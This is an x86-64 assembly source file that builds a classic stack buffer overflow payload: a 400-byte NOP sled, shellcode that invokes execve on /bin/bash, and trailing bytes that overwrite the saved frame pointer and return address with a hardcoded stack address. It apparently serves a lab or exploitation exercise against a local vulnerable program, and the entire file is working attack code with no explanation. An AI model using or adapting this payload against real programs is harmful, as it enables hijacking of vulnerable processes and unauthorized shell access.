bits 64

global _start
_start:
    times 400 nop               ; NOP sled

    ; 59	sys_execve	const char *filename	const char *const argv[]	const char *const envp[]
    ; (rdi, rsi, rdx, r10, r8, r9)
    mov rax, 59                 ; system call number (59 = sys_execve)
    lea rdi, [rel binbash]      ; load ptr to bash string into rdi
    xor rsi, rsi                ; zero rsi
    xor rdx, rdx                ; zero rdx
    syscall

    times 5 nop

binbash:
    db '/bin/bash', 0x00

ALIGN 512                 ; 512-byte alignment for this code after here
    times 8 nop           ; overwrite saved rbp
    dq 0x7fffffffe090     ; overwrite rip ([rbp+8])
    ;dq 0x7fffffffe1c0     ; overwrite rip ([rbp+8])